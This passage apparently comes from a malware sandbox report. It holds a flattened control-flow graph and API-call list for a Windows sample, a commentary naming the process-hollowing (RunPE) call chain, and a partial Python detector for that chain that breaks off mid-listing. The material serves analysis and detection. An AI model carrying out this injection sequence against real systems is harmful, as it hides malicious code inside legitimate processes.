3489->3492 3491 40a481 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 3490->3491 3500 40a508 3491->3500 3496 40a5b2 LPtoDP 3492->3496 3492->3500 3502 40a640 3492->3502 3493 40a65a GetWindowRect 3494 40a67d 3493->3494 3503 404a40 CopyRect 3494->3503 3497 40a5e5 3496->3497 3498 40a5fd GetMapMode 3497->3498 3499 40b054 3498->3499 3501 40a616 DPtoLP 3499->3501 3500->3480 3501->3502 3502->3493 3504 4039c0 3 API calls 3503->3504 3505 404a71 CopyRect 3504->3505 3506 4039c0 3 API calls 3505->3506 3507 404a91 CopyRect 3506->3507 3508 4039c0 3 API calls 3507->3508 3509 404ab1 CopyRect 3508->3509 3510 4039c0 3 API calls 3509->3510 3511 404ad1 CopyRect 3510->3511 3512 4039c0 3 API calls 3511->3512 3513 404af1 CopyRect 3512->3513 3514 4039c0 3 API calls 3513->3514 3515 404b11 CopyRect 3514->3515 3516 4039c0 3 API calls 3515->3516 3517 404b31 CopyRect 3516->3517 3518 4039c0 3 API calls 3517->3518 3519 404b51 CopyRect 3518->3519 3520 4039c0 3 API calls 3519->3520 3521 404b71 CopyRect 3520->3521 3522 4039c0 3 API calls 3521->3522 3523 404b91 CopyRect 3522->3523 3524 4039c0 3 API calls 3523->3524 3525 404bb1 CopyRect 3524->3525 3526 4039c0 3 API calls 3525->3526 3527 404bd1 CopyRect 3526->3527 3528 4039c0 3 API calls 3527->3528 3529 404bf1 CopyRect 3528->3529 3530 4039c0 3 API calls 3529->3530 3531 404c11 CopyRect 3530->3531 3532 4039c0 3 API calls 3531->3532 3533 404c31 CopyRect 3532->3533 3534 4039c0 3 API calls 3533->3534 3535 404c51 CopyRect 3534->3535 3536 4039c0 3 API calls 3535->3536 3537 404c71 CopyRect 3536->3537 3538 4039c0 3 API calls 3537->3538 3539 404c91 CopyRect 3538->3539 3540 4039c0 3 API calls 3539->3540 3541 404cb1 CopyRect 3540->3541 3542 4039c0 3 API calls 3541->3542 3543 404cd1 CopyRect 3542->3543 3544 4039c0 3 API calls 3543->3544 3545 404cf1 CopyRect 3544->3545 3546 4039c0 3 API calls 3545->3546 3547 404d11 CopyRect 3546->3547 3548 4039c0 3 API calls 3547->3548 3549 404d31 CopyRect 3548->3549 3550 4039c0 3 API calls 3549->3550 3551 
404d51 CopyRect 3550->3551 3552 4039c0 3 API calls 3551->3552 3553 404d71 CopyRect 3552->3553 3554 4039c0 3 API calls 3553->3554 3555 404d91 CopyRect 3554->3555 3556 4039c0 3 API calls 3555->3556 3557 404db1 CopyRect 3556->3557 3558 4039c0 3 API calls 3557->3558 3559 404dd1 CopyRect 3558->3559 3560 4039c0 3 API calls 3559->3560 3561 404df1 CopyRect 3560->3561 3562 4039c0 3 API calls 3561->3562 3563 404e11 CopyRect 3562->3563 3564 4039c0 3 API calls 3563->3564 3565 404e31 CopyRect 3564->3565 3566 4039c0 3 API calls 3565->3566 3567 404e51 CopyRect 3566->3567 3568 4039c0 3 API calls 3567->3568 3569 404e71 CopyRect 3568->3569 3570 4039c0 3 API calls 3569->3570 3571 404e91 CopyRect 3570->3571 3572 4039c0 3 API calls 3571->3572 3573 404eb1 3572->3573 3573->3500 3575 40ad00 DrawTextA 2569 40b10f __set_app_type __p__fmode __p__commode 2570 40b17e 2569->2570 2571 40b192 2570->2571 2572 40b186 __setusermatherr 2570->2572 2581 40b280 _controlfp 2571->2581 2572->2571 2574 40b197 _initterm __getmainargs _initterm 2575 40b1eb GetStartupInfoA 2574->2575 2577 40b21f GetModuleHandleA 2575->2577 2582 40b2a2 69FD4ED0 2577->2582 2580 40b243 exit _XcptFilter 2581->2574 2582->2580 2583 40ac50 TextOutA 2585 40ac10 PtVisible 2586 40a810 2590 409c60 2586->2590 2588 40a838 ReleaseCapture GetWindowRect 2589 40a863 2588->2589 2591 409c6c 2590->2591 2591->2588 3589 40a190 3590 40a198 ReleaseCapture 3589->3590 2592 409e20 2595 409e47 2592->2595 2593 409f76 GetWindowRect 2594 409f99 2593->2594 2604 401040 CopyRect 2594->2604 2597 409ece LPtoDP 2595->2597 2602 409f5c 2595->2602 2598 409f01 2597->2598 2599 409f19 GetMapMode 2598->2599 2600 40b054 2599->2600 2601 409f32 DPtoLP 2600->2601 2601->2602 2602->2593 2603 409fab 2935 4039c0 2604->2935 2606 401071 CopyRect 2941 404670 2606->2941 2608 401091 CopyRect 2609 4039c0 3 API calls 2608->2609 2610 4010b1 CopyRect 2609->2610 2611 404670 3 API calls 2610->2611 2612 4010d1 CopyRect 2611->2612 2613 4039c0 3 API calls 2612->2613 2614 4010f1 CopyRect 
2613->2614 2615 404670 3 API calls 2614->2615 2616 401111 CopyRect 2615->2616 2617 4039c0 3 API calls 2616->2617 2618 401131 CopyRect 2617->2618 2619 404670 3 API calls 2618->2619 2620 401151 CopyRect 2619->2620 2621 4039c0 3 API calls 2620->2621 2622 401171 CopyRect 2621->2622 2623 404670 3 API calls 2622->2623 2624 401191 CopyRect 2623->2624 2625 4039c0 3 API calls 2624->2625 2626 4011b1 CopyRect 2625->2626 2627 404670 3 API calls 2626->2627 2628 4011d1 CopyRect 2627->2628 2629 4039c0 3 API calls 2628->2629 2630 4011f1 CopyRect 2629->2630 2631 404670 3 API calls 2630->2631 2632 401211 CopyRect 2631->2632 2633 4039c0 3 API calls 2632->2633 2634 401231 CopyRect 2633->2634 2635 404670 3 API calls 2634->2635 2636 401251 CopyRect 2635->2636 2637 4039c0 3 API calls 2636->2637 2638 401271 CopyRect 2637->2638 2639 404670 3 API calls 2638->2639 2640 401291 CopyRect 2639->2640 2641 4039c0 3 API calls 2640->2641 2642 4012b1 CopyRect 2641->2642 2643 404670 3 API calls 2642->2643 2644 4012d1 CopyRect 2643->2644 2645 4039c0 3 API calls 2644->2645 2646 4012f1 CopyRect 2645->2646 2647 404670 3 API calls 2646->2647 2648 401311 CopyRect 2647->2648 2649 4039c0 3 API calls 2648->2649 2650 401331 CopyRect 2649->2650 2651 404670 3 API calls 2650->2651 2652 401351 CopyRect 2651->2652 2653 4039c0 3 API calls 2652->2653 2654 401371 CopyRect 2653->2654 2655 404670 3 API calls 2654->2655 2656 401391 CopyRect 2655->2656 2657 4039c0 3 API calls 2656->2657 2658 4013b1 CopyRect 2657->2658 2659 404670 3 API calls 2658->2659 2660 4013d1 CopyRect 2659->2660 2661 4039c0 3 API calls 2660->2661 2662 4013f1 CopyRect 2661->2662 2663 404670 3 API calls 2662->2663 2664 401411 CopyRect 2663->2664 2665 4039c0 3 API calls 2664->2665 2666 401431 CopyRect 2665->2666 2667 404670 3 API calls 2666->2667 2668 401451 CopyRect 2667->2668 2669 4039c0 3 API calls 2668->2669 2670 401471 CopyRect 2669->2670 2671 404670 3 API calls 2670->2671 2672 401491 CopyRect 2671->2672 2673 4039c0 3 API calls 2672->2673 2674 
4014b1 CopyRect 2673->2674 2675 404670 3 API calls 2674->2675 2676 4014d1 CopyRect 2675->2676 2677 4039c0 3 API calls 2676->2677 2678 4014f1 CopyRect 2677->2678 2679 404670 3 API calls 2678->2679 2680 401511 CopyRect 2679->2680 2681 4039c0 3 API calls 2680->2681 2682 401531 CopyRect 2681->2682 2683 404670 3 API calls 2682->2683 2684 401551 CopyRect 2683->2684 2685 4039c0 3 API calls 2684->2685 2686 401571 CopyRect 2685->2686 2687 404670 3 API calls 2686->2687 2688 401591 CopyRect 2687->2688 2689 4039c0 3 API calls 2688->2689 2690 4015b1 CopyRect 2689->2690 2691 404670 3 API calls 2690->2691 2692 4015d1 CopyRect 2691->2692 2693 4039c0 3 API calls 2692->2693 2694 4015f1 CopyRect 2693->2694 2695 404670 3 API calls 2694->2695 2696 401611 CopyRect 2695->2696 2697 4039c0 3 API calls 2696->2697 2698 401631 CopyRect 2697->2698 2699 404670 3 API calls 2698->2699 2700 401651 CopyRect 2699->2700 2701 4039c0 3 API calls 2700->2701 2702 401671 CopyRect 2701->2702 2703 404670 3 API calls 2702->2703 2704 401691 CopyRect 2703->2704 2705 4039c0 3 API calls 2704->2705 2706 4016b1 CopyRect 2705->2706 2707 404670 3 API calls 2706->2707 2708 4016d1 CopyRect 2707->2708 2709 4039c0 3 API calls 2708->2709 2710 4016f1 CopyRect 2709->2710 2711 404670 3 API calls 2710->2711 2712 401711 CopyRect 2711->2712 2713 4039c0 3 API calls 2712->2713 2714 401731 CopyRect 2713->2714 2715 404670 3 API calls 2714->2715 2716 401751 CopyRect 2715->2716 2717 4039c0 3 API calls 2716->2717 2718 401771 CopyRect 2717->2718 2719 404670 3 API calls 2718->2719 2720 401791 CopyRect 2719->2720 2721 4039c0 3 API calls 2720->2721 2722 4017b1 CopyRect 2721->2722 2723 404670 3 API calls 2722->2723 2724 4017d1 CopyRect 2723->2724 2725 4039c0 3 API calls 2724->2725 2726 4017f1 CopyRect 2725->2726 2727 404670 3 API calls 2726->2727 2728 401811 CopyRect 2727->2728 2729 4039c0 3 API calls 2728->2729 2730 401831 CopyRect 2729->2730 2731 404670 3 API calls 2730->2731 2732 401851 CopyRect 2731->2732 2733 4039c0 3 API calls 
2732->2733 2734 401871 CopyRect 2733->2734 2735 404670 3 API calls 2734->2735 2736 401891 CopyRect 2735->2736 2737 4039c0 3 API calls 2736->2737 2738 4018b1 CopyRect 2737->2738 2739 404670 3 API calls 2738->2739 2740 4018d1 CopyRect 2739->2740 2741 4039c0 3 API calls 2740->2741 2742 4018f1 CopyRect 2741->2742 2743 404670 3 API calls 2742->2743 2744 401911 CopyRect 2743->2744 2745 4039c0 3 API calls 2744->2745 2746 401931 CopyRect 2745->2746 2747 404670 3 API calls 2746->2747 2748 401951 CopyRect 2747->2748 2749 4039c0 3 API calls 2748->2749 2750 401971 CopyRect 2749->2750 2751 404670 3 API calls 2750->2751 2752 401991 CopyRect 2751->2752 2753 4039c0 3 API calls 2752->2753 2754 4019b1 CopyRect 2753->2754 2755 404670 3 API calls 2754->2755 2756 4019d1 CopyRect 2755->2756 2757 4039c0 3 API calls 2756->2757 2758 4019f1 CopyRect 2757->2758 2759 404670 3 API calls 2758->2759 2760 401a11 CopyRect 2759->2760 2761 4039c0 3 API calls 2760->2761 2762 401a31 CopyRect 2761->2762 2763 404670 3 API calls 2762->2763 2764 401a51 CopyRect 2763->2764 2765 4039c0 3 API calls 2764->2765 2766 401a71 CopyRect 2765->2766 2767 404670 3 API calls 2766->2767 2768 401a91 CopyRect 2767->2768 2769 4039c0 3 API calls 2768->2769 2770 401ab1 CopyRect 2769->2770 2771 404670 3 API calls 2770->2771 2772 401ad1 CopyRect 2771->2772 2773 4039c0 3 API calls 2772->2773 2774 401af1 CopyRect 2773->2774 2775 404670 3 API calls 2774->2775 2776 401b11 CopyRect 2775->2776 2777 4039c0 3 API calls 2776->2777 2778 401b31 CopyRect 2777->2778 2779 404670 3 API calls 2778->2779 2780 401b51 CopyRect 2779->2780 2781 4039c0 3 API calls 2780->2781 2782 401b71 CopyRect 2781->2782 2783 404670 3 API calls 2782->2783 2784 401b91 CopyRect 2783->2784 2785 4039c0 3 API calls 2784->2785 2786 401bb1 CopyRect 2785->2786 2787 404670 3 API calls 2786->2787 2788 401bd1 CopyRect 2787->2788 2789 4039c0 3 API calls 2788->2789 2790 401bf1 CopyRect 2789->2790 2791 404670 3 API calls 2790->2791 2792 401c11 CopyRect 2791->2792 2793 4039c0 3 
API calls 2792->2793 2794 401c31 CopyRect 2793->2794 2795 404670 3 API calls 2794->2795 2796 401c51 CopyRect 2795->2796 2797 4039c0 3 API calls 2796->2797 2798 401c71 CopyRect 2797->2798 2799 404670 3 API calls 2798->2799 2800 401c91 CopyRect 2799->2800 2801 4039c0 3 API calls 2800->2801 2802 401cb1 CopyRect 2801->2802 2803 404670 3 API calls 2802->2803 2804 401cd1 CopyRect 2803->2804 2805 4039c0 3 API calls 2804->2805 2806 401cf1 CopyRect 2805->2806 2807 404670 3 API calls 2806->2807 2808 401d11 CopyRect 2807->2808 2809 4039c0 3 API calls 2808->2809 2810 401d31 CopyRect 2809->2810 2811 404670 3 API calls 2810->2811 2812 401d51 CopyRect 2811->2812 2813 4039c0 3 API calls 2812->2813 2814 401d71 CopyRect 2813->2814 2815 404670 3 API calls 2814->2815 2816 401d91 CopyRect 2815->2816 2817 4039c0 3 API calls 2816->2817 2818 401db1 CopyRect 2817->2818 2819 404670 3 API calls 2818->2819 2820 401dd1 CopyRect 2819->2820 2821 4039c0 3 API calls 2820->2821 2822 401df1 CopyRect 2821->2822 2823 404670 3 API calls 2822->2823 2824 401e11 CopyRect 2823->2824 2825 4039c0 3 API calls 2824->2825 2826 401e31 CopyRect 2825->2826 2827 404670 3 API calls 2826->2827 2828 401e51 CopyRect 2827->2828 2829 4039c0 3 API calls 2828->2829 2830 401e71 CopyRect 2829->2830 2831 404670 3 API calls 2830->2831 2832 401e91 CopyRect 2831->2832 2833 4039c0 3 API calls 2832->2833 2834 401eb1 CopyRect 2833->2834 2835 404670 3 API calls 2834->2835 2836 401ed1 CopyRect 2835->2836 2837 4039c0 3 API calls 2836->2837 2838 401ef1 CopyRect 2837->2838 2839 404670 3 API calls 2838->2839 2840 401f11 CopyRect 2839->2840 2841 4039c0 3 API calls 2840->2841 2842 401f31 CopyRect 2841->2842 2843 404670 3 API calls 2842->2843 2844 401f51 CopyRect 2843->2844 2845 4039c0 3 API calls 2844->2845 2846 401f71 CopyRect 2845->2846 2847 404670 3 API calls 2846->2847 2848 401f91 CopyRect 2847->2848 2849 4039c0 3 API calls 2848->2849 2850 401fb1 CopyRect 2849->2850 2851 404670 3 API calls 2850->2851 2852 401fd1 CopyRect 2851->2852 
2853 4039c0 3 API calls 2852->2853 2854 401ff1 CopyRect 2853->2854 2855 404670 3 API calls 2854->2855 2856 402011 CopyRect 2855->2856 2857 4039c0 3 API calls 2856->2857 2858 402031 CopyRect 2857->2858 2859 404670 3 API calls 2858->2859 2860 402051 CopyRect 2859->2860 2861 4039c0 3 API calls 2860->2861 2862 402071 CopyRect 2861->2862 2863 404670 3 API calls 2862->2863 2864 402091 CopyRect 2863->2864 2865 4039c0 3 API calls 2864->2865 2866 4020b1 CopyRect 2865->2866 2867 404670 3 API calls 2866->2867 2868 4020d1 CopyRect 2867->2868 2869 4039c0 3 API calls 2868->2869 2870 4020f1 CopyRect 2869->2870 2871 404670 3 API calls 2870->2871 2872 402111 CopyRect 2871->2872 2873 4039c0 3 API calls 2872->2873 2874 402131 CopyRect 2873->2874 2875 404670 3 API calls 2874->2875 2876 402151 CopyRect 2875->2876 2877 4039c0 3 API calls 2876->2877 2878 402171 CopyRect 2877->2878 2879 404670 3 API calls 2878->2879 2880 402191 CopyRect 2879->2880 2881 4039c0 3 API calls 2880->2881 2882 4021b1 CopyRect 2881->2882 2883 4039c0 3 API calls 2882->2883 2884 4021d1 CopyRect 2883->2884 2947 4040f0 2884->2947 2886 4021f1 CopyRect 2887 4039c0 3 API calls 2886->2887 2888 402211 CopyRect 2887->2888 2889 4040f0 3 API calls 2888->2889 2890 402231 CopyRect 2889->2890 2891 4039c0 3 API calls 2890->2891 2892 402251 CopyRect 2891->2892 2893 4040f0 3 API calls 2892->2893 2894 402271 CopyRect 2893->2894 2895 4040f0 3 API calls 2894->2895 2896 402291 CopyRect 2895->2896 2897 4039c0 3 API calls 2896->2897 2898 4022b1 CopyRect 2897->2898 2899 4040f0 3 API calls 2898->2899 2900 4022d1 CopyRect 2899->2900 2901 4039c0 3 API calls 2900->2901 2902 4022f1 CopyRect 2901->2902 2903 4040f0 3 API calls 2902->2903 2904 402311 CopyRect 2903->2904 2905 4039c0 3 API calls 2904->2905 2906 402331 CopyRect 2905->2906 2907 4040f0 3 API calls 2906->2907 2908 402351 CopyRect 2907->2908 2909 4040f0 3 API calls 2908->2909 2910 402371 CopyRect 2909->2910 2911 4040f0 3 API calls 2910->2911 2912 402391 CopyRect 2911->2912 2913 4039c0 
Control-flow graph (flattened node list, continued): basic blocks and the calls they make
• 4023b1 .. 4024f1: CopyRect in each block, alternating with the helpers at 4039c0 and 4040f0 (3 API calls each)
• 4039c0 helper: 4039f4 -> 403b03 (_ftol, _ftol) -> 403b5e -> 403b90 Polygon -> 403bac
• 4046a5: 404776 (_ftol, _ftol) -> 4047d8 -> 4047eb Polyline -> 404805
• 4040f0 helper: 40412b -> 40423e (_ftol, _ftol) -> 404299 -> 4042c9 PolyPolygon -> 4042ed
• 40ada0: EnableWindow
• 40a7a0: GetWindowRect -> 40a7c1 -> 404ec0 (24 API calls) -> 40a7e1 SetCapture -> 40a7f4
• 40b261: _exit
• 40b2e3 -> 40b2e8 -> 40b2ba -> 40b2bf -> 40b2d4 _setmbcp / 40b2dd
• 405830 -> 40a1b0 -> 40a1d9 -> 40a1fd LoadIconA -> 405856
• 40ac30: RectVisible
• 40acb0: TabbedTextOutA
• 40ad70: Escape
• 40ad30 -> 40ad38 -> 40ad3b GrayStringA
• 4057f0 -> 4057f5 -> 40b0c8 -> 40b09c -> 40b0b1 __dllonexit / 40b0a5 _onexit -> 40581a
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004074EA
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407500
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
                                                                        • LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
                                                                        • LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
                                                                        • LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
                                                                        • LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
                                                                        • LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
                                                                        • LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
                                                                        • LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
                                                                        • LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
                                                                        • wcscpy.MSVCRT ref: 00407B17
                                                                        • wcscpy.MSVCRT ref: 00407F50
                                                                        • wcscat.MSVCRT ref: 00407F7A
                                                                        • wcscpy.MSVCRT ref: 00407F8A
                                                                        • wcscat.MSVCRT ref: 00407F9E
                                                                        • wcscat.MSVCRT ref: 00408144
                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
                                                                        • Wow64GetThreadContext.KERNEL32 ref: 004081A2
                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
                                                                        • VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
                                                                        • WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
                                                                        • Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
                                                                        • Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
                                                                        • wcscpy.MSVCRT ref: 00408760
                                                                        • wcscat.MSVCRT ref: 00408774
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
                                                                        • CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
                                                                        • ResumeThread.KERNELBASE(?), ref: 004087FC
                                                                        • Sleep.KERNELBASE(00000002), ref: 00408815
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
                                                                        • Module32First.KERNEL32(00000000,00000000), ref: 004088AC
                                                                        • strstr.MSVCRT ref: 004088D6
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 00408904
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040891F
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408930
                                                                        • ResumeThread.KERNELBASE(?), ref: 00408949
                                                                        • Sleep.KERNELBASE(00000002), ref: 0040894D
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408956
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040897B
                                                                        • Sleep.KERNELBASE(00000005), ref: 0040898A
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
                                                                        • wcscat.MSVCRT ref: 00408A5B
                                                                        • wcsstr.MSVCRT ref: 00408A82
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
                                                                        • TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
                                                                        • strstr.MSVCRT ref: 00408E02
                                                                        • strstr.MSVCRT ref: 00408E16
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
                                                                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
                                                                        • CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
                                                                        • wcslen.MSVCRT ref: 00409045
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
                                                                        • wcscat.MSVCRT ref: 004090E9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
                                                                        • ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
                                                                        • Sleep.KERNELBASE(00000320), ref: 004099F6
                                                                        • TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
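The calls between ref 0040817F and ref 00408486 are the textbook process-hollowing (RunPE) chain: CreateProcessW with dwCreationFlags 00000004 (CREATE_SUSPENDED), Wow64GetThreadContext and a 4-byte NtReadVirtualMemory on the child, NtUnmapViewOfSection to evict the original image, VirtualAllocEx with 00003000/00000040 (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE), a series of WriteProcessMemory calls, Wow64SetThreadContext and finally ResumeThread. The detector below is an added example, not Joe Sandbox's or the sample's own code: it parses API lines in the report's own format and flags that ordered chain. The stage list, the Nt/Zw aliases and the BENIGN_TRACE are my assumptions; SAMPLE_TRACE is a subset of the lines above in their original order.

```python
# Added example (not Joe Sandbox's or the sample's own code): flag the RunPE-style
# process-hollowing chain in a Joe Sandbox API listing of the form
# '• Name.MODULE(args), ref: ADDR'. Stage list and Nt/Zw aliases are assumptions.
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<name>\w+)\.(?P<module>[\w.]+)"   # Name.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                         # optional (args)
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"    # optional ref: ADDR
)
CREATE_SUSPENDED = 0x4                       # dwCreationFlags, CreateProcess* arg index 5
PAGE_EXECUTE_ANY = {0x10, 0x20, 0x40, 0x80}  # PAGE_EXECUTE*, VirtualAllocEx arg index 4

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]  # None for '?' or a string argument such as '.dll'
    ref: Optional[int]         # caller address after 'ref:'

def _hex_or_none(tok: str) -> Optional[int]:
    tok = tok.strip()
    try:
        return int(tok, 16) if tok and tok != "?" else None
    except ValueError:
        return None

def parse_api_lines(text: str) -> List[ApiCall]:
    """Direct API lines only; 'Part of subcall function' lines do not match."""
    calls = []
    for m in filter(None, map(API_LINE.match, text.splitlines())):
        raw = m.group("args")
        args = [_hex_or_none(t) for t in raw.split(",")] if raw else []
        ref = int(m.group("ref"), 16) if m.group("ref") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args, ref))
    return calls

def _suspended_create(c: ApiCall) -> bool:
    f = c.args[5] if len(c.args) > 5 else None
    return c.name.startswith("CreateProcess") and f is not None and bool(f & CREATE_SUSPENDED)

def _exec_alloc(c: ApiCall) -> bool:
    p = c.args[4] if len(c.args) > 4 else None
    return c.name == "VirtualAllocEx" and p is not None and (p & 0xFF) in PAGE_EXECUTE_ANY

def _named(*names):
    return lambda c: c.name in names

# (stage, predicate, required). Required stages must occur in this order; optional
# stages only count when they fall between the suspended create and the resume.
STAGES = [
    ("create_suspended", _suspended_create, True),
    ("unmap_image", _named("NtUnmapViewOfSection", "ZwUnmapViewOfSection"), False),
    ("alloc_exec", _exec_alloc, False),
    ("write_memory", _named("WriteProcessMemory", "NtWriteVirtualMemory"), True),
    ("set_context", _named("SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"), True),
    ("resume", _named("ResumeThread", "NtResumeThread"), True),
]

def detect_process_hollowing(calls: List[ApiCall]) -> Dict[str, object]:
    """Return {'hollowing': bool, 'evidence': {stage: caller ref}, 'missing': stage or None}."""
    idx, pos = {}, 0
    for stage, pred, required in STAGES:
        if required:
            hit = next((i for i in range(pos, len(calls)) if pred(calls[i])), None)
            if hit is None:
                return {"hollowing": False, "evidence": {s: calls[i].ref for s, i in idx.items()}, "missing": stage}
            idx[stage], pos = hit, hit + 1
    lo, hi = idx["create_suspended"], idx["resume"]
    for stage, pred, required in STAGES:
        hit = None if required else next((i for i in range(lo, hi) if pred(calls[i])), None)
        if hit is not None:
            idx[stage] = hit
    return {"hollowing": True, "evidence": {s: calls[i].ref for s, i in idx.items()}, "missing": None}

# Subset of the API listing above, same order.
SAMPLE_TRACE = """
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
• Wow64GetThreadContext.KERNEL32 ref: 004081A2
• NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
• VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
• WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
• Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
• WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
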